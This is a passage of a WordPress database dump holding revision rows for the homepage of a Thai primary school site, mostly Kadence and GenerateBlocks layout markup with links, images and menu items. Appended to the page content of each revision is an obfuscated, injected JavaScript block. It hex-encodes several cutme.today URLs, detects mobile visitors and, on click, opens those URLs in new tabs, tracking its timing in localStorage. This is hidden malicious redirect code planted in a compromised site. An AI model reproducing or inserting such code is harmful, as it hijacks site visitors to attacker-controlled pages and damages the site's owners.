_0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:55:15','2024-07-27 03:55:15','',14,'http://pakhaeng.ssk.in.th/?p=57',0,'revision','',0),
(59,1,'2024-07-27 10:57:19','2024-07-27 03:57:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"14_add57c-9d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:57:19','2024-07-27 03:57:19','',14,'http://pakhaeng.ssk.in.th/?p=59',0,'revision','',0),
